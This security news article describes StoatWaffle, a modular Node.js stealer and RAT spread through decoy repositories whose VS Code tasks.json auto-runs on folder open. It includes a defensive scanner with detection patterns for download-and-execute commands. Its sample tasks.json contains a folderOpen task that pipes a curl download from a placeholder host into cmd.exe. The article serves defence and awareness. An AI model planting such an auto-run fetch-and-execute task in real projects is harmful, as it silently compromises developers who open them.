Image: NTT Security Japan
A new modular malware threat has been identified in the wild, signaling a shift in tactics for North Korean-linked threat actors. Security researchers at NTT Security Japan have uncovered StoatWaffle, a Node.js-based malware currently being deployed by WaterPlum Team 8 (also known as the Moralis or Modilus family).
Historically, this group has been associated with the “Contagious Interview” campaign—a social engineering scheme targeting developers—where they previously relied on a malware known as OtterCookie. However, as of December 2025, the group has integrated StoatWaffle into their arsenal to enhance their data-theft capabilities.
The attack begins not with a traditional executable, but with a “trap” set within a development environment. Team 8 uses blockchain-related projects as decoys to lure unsuspecting victims.
“This malicious repository contains a .vscode directory that contains a tasks.json file,” the analysis explains.
If a developer opens and trusts this repository in Visual Studio Code (VSCode), the tasks.json file automatically triggers a malicious sequence. The technical trick lies in the runOn key within the runOptions of the JSON file. When set to folderOpen, the designated malicious task executes the moment the directory is opened.
The infection process is a highly orchestrated, multi-stage “downloader” sequence designed to bypass initial scrutiny:
- Initial Bootstrap: The tasks.json downloads data from a Vercel-hosted web app, which is then executed by cmd.exe.
- Environment Setup: A batch file named vscode-bootstrap.cmd checks for Node.js. If it’s missing, the script actually downloads and installs the official version to ensure the malware can run.
- StoatWaffle Launch: The script then fetches env.npl, which serves as the “initial downloader of StoatWaffle”.
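The folderOpen trigger described above is a legitimate VS Code feature, so the defensive question is how to spot a repository that abuses it before the folder is trusted. The following scanner is an added example written for this article, not code from NTT Security Japan or from the malware itself: it parses a tasks.json (tolerating the comments and trailing commas VS Code allows), keeps only tasks with runOptions.runOn set to folderOpen, and flags command lines that match the downloader shape described in the infection chain. The heuristic patterns, the sample tasks.json, and the placeholder.invalid hostname are all constructed for illustration; the real infrastructure is not reproduced.

```javascript
// Added example (not NTT Security Japan's or the malware author's code):
// find tasks in a VS Code tasks.json that auto-run on folder open and
// flag the ones whose command line looks like a staged downloader.

// tasks.json is JSONC: VS Code accepts // and /* */ comments and trailing
// commas, so JSON.parse alone would reject many real-world files.
function stripJsonComments(text) {
  let out = '';
  let inString = false;
  let i = 0;
  while (i < text.length) {
    const ch = text[i];
    const next = text[i + 1];
    if (inString) {
      out += ch;
      if (ch === '\\' && next !== undefined) { out += next; i += 2; continue; }
      if (ch === '"') inString = false;
      i += 1;
      continue;
    }
    if (ch === '"') { inString = true; out += ch; i += 1; continue; }
    if (ch === '/' && next === '/') {            // line comment: drop to end of line
      while (i < text.length && text[i] !== '\n') i += 1;
      continue;                                  // the newline itself is kept
    }
    if (ch === '/' && next === '*') {            // block comment: drop through */
      const end = text.indexOf('*/', i + 2);
      i = end === -1 ? text.length : end + 2;
      continue;
    }
    out += ch;
    i += 1;
  }
  return out;
}

// Heuristics (assumption: chosen for this example) mirroring the chain in the
// article: remote download, hand-off to cmd.exe, piping data into an interpreter.
const SUSPICIOUS_PATTERNS = [
  ['remote-download', /\b(curl|wget|Invoke-WebRequest|iwr|DownloadString|DownloadFile)\b/i],
  ['cmd-exe', /\bcmd(\.exe)?\b/i],
  ['pipe-to-interpreter', /\|\s*(cmd(\.exe)?|sh|bash|node|powershell)\b/i],
];

// Returns one finding per task configured with runOptions.runOn === "folderOpen".
function findAutoRunTasks(tasksJsonText) {
  const cleaned = stripJsonComments(tasksJsonText).replace(/,(\s*[}\]])/g, '$1');
  const doc = JSON.parse(cleaned);
  const tasks = Array.isArray(doc.tasks) ? doc.tasks : [];
  const findings = [];
  for (const task of tasks) {
    const runOn = task.runOptions && task.runOptions.runOn;
    if (runOn !== 'folderOpen') continue;      // only auto-start tasks matter here
    // command may be a string or a per-OS object; args may be absent
    const commandLine = [task.command, ...(Array.isArray(task.args) ? task.args : [])]
      .filter((part) => typeof part === 'string')
      .join(' ');
    const reasons = SUSPICIOUS_PATTERNS
      .filter(([, re]) => re.test(commandLine))
      .map(([name]) => name);
    findings.push({ label: task.label, type: task.type, commandLine, reasons });
  }
  return findings;
}

// Constructed sample: the first task is benign, the second reproduces the
// shape of the trap (auto-run on folderOpen, fetch a payload, hand to cmd.exe).
// Hostname and path are placeholders, not the campaign's infrastructure.
const SAMPLE_TASKS_JSON = `{
  // comments like this one are legal in tasks.json
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "prepare environment",
      "type": "shell",
      "command": "curl -s https://placeholder.invalid/stage1 | cmd.exe",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}`;

for (const f of findAutoRunTasks(SAMPLE_TASKS_JSON)) {
  console.log(`auto-run task "${f.label}" (${f.type}): ${f.commandLine} -> ${f.reasons.join(', ')}`);
}
```

Run it over each .vscode/tasks.json in a freshly cloned repository before accepting the Workspace Trust prompt; any task with runOn set to folderOpen deserves a manual look even when no pattern matches, since the heuristics only cover the downloader shapes named in this article.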
StoatWaffle is built for modularity, allowing the attackers to push different functionalities as needed.
- The Stealer Module: This component is designed for maximum credential harvesting. “Stealer module steals credentials stored on Web browsers and designated browser extension data and uploads them to the C2 server”. It specifically targets Chromium and Firefox extensions and can even steal the Keychain database on macOS.
- The RAT Module: The Remote Access Trojan (RAT) module provides the attackers with persistent control, regularly polling the Command and Control (C2) server for new instructions to execute on the victim’s machine.
One of the most interesting features of StoatWaffle is its ability to recognize and exploit the Windows Subsystem for Linux (WSL). If the malware detects it is running in a WSL environment, it automatically converts Windows user profile paths to Linux paths using wslpath. As the researchers noted, “This allows an attacker to access Windows data from Node.js on WSL”.
The emergence of StoatWaffle proves that WaterPlum is “continuously developing new malware and updating existing ones”. For developers, this serves as a stark reminder that even a simple git clone or opening a project folder can lead to a full system compromise.